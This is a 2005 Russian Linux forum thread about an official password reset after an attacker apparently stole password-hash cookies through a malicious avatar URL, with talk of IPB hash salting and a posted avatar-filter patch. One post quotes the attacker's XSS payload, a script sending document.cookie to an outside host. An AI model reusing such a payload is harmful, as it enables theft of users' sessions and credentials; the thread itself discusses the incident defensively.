Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
Смена паролей (официальное объявление)
Модератор: Модераторы разделов
-
t.t
- Бывший модератор
- Сообщения: 7390
- Статус: думающий о вечном
- ОС: Debian, LMDE
Re: Смена паролей
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
-
Nick S. Grechukh
- Сообщения: 108
Re: Смена паролей
ну понятно. если *сейчас* сменить формат , то те хэши не помогут.
тогда пострадают только те у кого короткие пароли, причем одинаковые на всех сайтах.
ALT Linux Sisyphus 2.6.11-std26-up-alt6 KDE 3.4
В действительности все обстоит совершенно иначе, чем на самом деле...
В действительности все обстоит совершенно иначе, чем на самом деле...
-
valeri_ufo
- Бывший модератор
- Сообщения: 274
- Статус: Everywhere, yet nowhere
Re: Смена паролей
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 16:23) писал(а):
ну понятно. если *сейчас* сменить формат , то те хэши не помогут.
тогда пострадают только те у кого короткие пароли, причем одинаковые на всех сайтах.
пострадают те кто их не сменил.
-
Xenon
- Бывший модератор
- Сообщения: 359
- ОС: Debian
Re: Смена паролей
Хм. Давайте кто-нибудь попробует ЭТИМ методом сломать форум и посмотреть, получится ли ? Если получится, то точно нужно что-то делать, если нет, то нафиг заморачиваться ?
-
Nick S. Grechukh
- Сообщения: 108
Re: Смена паролей
(valeri_ufo @ Вторник, 31 Мая 2005, 17:26) писал(а):пострадают те кто их не сменил.
хэш УЖЕ украден, и теоретически по нему можно подобрать пароль.
теперь любителям single sign-on [
ALT Linux Sisyphus 2.6.11-std26-up-alt6 KDE 3.4
В действительности все обстоит совершенно иначе, чем на самом деле...
В действительности все обстоит совершенно иначе, чем на самом деле...
-
bogus
- Сообщения: 160
Re: Смена паролей
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
Повторюсь: насколько я вижу, IPB и так использует не в чистом виде пароль при получении хэша. Во всяком случае, кука по форме похожа на md5 от чего-то, а md5(<мой пароль>) не совпадает со значением из куки.
Надо бы посмотреть в исходниках...
Как всякое несовершенное существо я могу ошибаться. Простите меня.
jabberId = foldl (flip (:)) [] "ur.rebbaj@43sugob"
jabberId = foldl (flip (:)) [] "ur.rebbaj@43sugob"
-
zenwolf
- Бывший модератор
- Сообщения: 3139
- Статус: Страшный и злой
- ОС: Slackware..Salix..x86_64
Re: Смена паролей
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 14:37) писал(а):(valeri_ufo @ Вторник, 31 Мая 2005, 17:26) писал(а):пострадают те кто их не сменил.
хэш УЖЕ украден, и теоретически по нему можно подобрать пароль.
теперь любителям single sign-on [] надо менять пароли везед, не только на linuxforum.
даже не теоретически ,а очень даже практически ,уже было такое на bsdportal ,
ОЧЕНЬ РЕКОМЕНДУЮ СМЕНИТЬ ПАРОЛИ .
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
-
Sonic
- Сообщения: 478
Re: Смена паролей
(bogus @ Вторник, 31 Мая 2005, 15:15) писал(а):а как IPB формирует этот хэш? Что-то мне подсказывает, что он использует не чистый пароль, а с какой-то секретной добавкой...
Естественно, только как не знаю. А меня пароль это не обезательно. Но если легче станет, то меняйте.
Ещё, я вроде ставил заплатку на загрузку аватарки. Регулярное выражение прописывали, но что-то видать не срослось
LinuxForum.ru :: Форум пользователей ОС Linux
-
alv
- Бывший модератор
- Сообщения: 7275
- Статус: Пенсионер в законе
- ОС: Cintu
Re: Смена паролей
(wolf_black @ Вторник, 31 Мая 2005, 17:56) писал(а):ОЧЕНЬ РЕКОМЕНДУЮ СМЕНИТЬ ПАРОЛИ .
Что не вредно и вообще - память потренировать, лучшее лекарство от раннего эклера
-
Sonic
- Сообщения: 478
Re: Смена паролей
Вот было:
стало
Вот эта строка if ( preg_match( "#java script:#is", $ibforums->input['url_avatar'] ) ) должна выбивать скрипт, но чё-то не сработало
Sonic добавил в 31.05.2005 19:36
И как он его влепил?
Код: Выделить всё
//-----------------------------------------
// Check to make sure we don't just have
// http:// in the URL box..
//-----------------------------------------
if ( preg_match( "/^http://$/i", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}
if ( empty($ibforums->input['url_avatar']) )стало
Код: Выделить всё
//-----------------------------------------
// Check to make sure we don't just have
// http:// in the URL box..
//-----------------------------------------
if ( preg_match( "/^http://$/i", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}
if ( preg_match( "#javascript:#is", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}
if ( empty($ibforums->input['url_avatar']) )Вот эта строка if ( preg_match( "#java script:#is", $ibforums->input['url_avatar'] ) ) должна выбивать скрипт, но чё-то не сработало
Sonic добавил в 31.05.2005 19:36
(Lindemidux @ Вторник, 31 Мая 2005, 13:20) писал(а):Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"
И как он его влепил?
LinuxForum.ru :: Форум пользователей ОС Linux
-
boot
- Сообщения: 289
Re: Смена паролей
Сменил.
Я прививок не боюсь, если надо - уколюсь
Я прививок не боюсь, если надо - уколюсь
-
Lindemidux
- Сообщения: 50
Re: Смена паролей
Месяц назад я качал с Flood3r.com видео: захват форума через автару.
Там его можно скачать.
Lindemidux добавил в 01.06.2005 08:53
Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер
Там его можно скачать.
Lindemidux добавил в 01.06.2005 08:53
Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер
-
snake
- Бывший модератор
- Сообщения: 677
Re: Смена паролей
(Lindemidux @ Среда, 01 Июня 2005, 7:53) писал(а):Месяц назад я качал с Flood3r.com видео: захват форума через автару.
Там его можно скачать.
Lindemidux добавил в 01.06.2005 08:53
Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер
Лучше перестраховаться, чем питаться потом собственными локтями.
В реальности все не так, как на самом деле...
JabberID: zmeyk@jabber.ru
JabberID: zmeyk@jabber.ru
-
VN_MAClover
- Сообщения: 1233
- Статус: Человек с бульвара Капуцинов
Re: Смена паролей
(snake @ Среда, 01 Июня 2005, 10:23) писал(а):Лучше перестраховаться, чем питаться потом собственными локтями.
Поддерживаю. Хотя в данном случае ничего сверхсекретного нет по определению, профилактика рулит, а, главное, вырабатывается правильный рефлекс поведения в данной ситуации.
In RMS we trust.
Зачем нам Ваши окна, если LAMPочка даёт достаточно света?
Зачем нам Ваши окна, если LAMPочка даёт достаточно света?
-
FreeNUX
- Сообщения: 185
- Статус: с сириуса
- ОС: FreeBSD 6.2
Re: Смена паролей
Сменил, мне не трудно
.
Аркона – лишь тихие воды,
Кровью варяжской янтарь в них застыл.
Аркона – там ветер со взморья
В трещинах скал своё сердце забыл.
Темнозорь - Аркона (Вольницей В Просинь Ночей - 2005)
Кровью варяжской янтарь в них застыл.
Аркона – там ветер со взморья
В трещинах скал своё сердце забыл.
Темнозорь - Аркона (Вольницей В Просинь Ночей - 2005)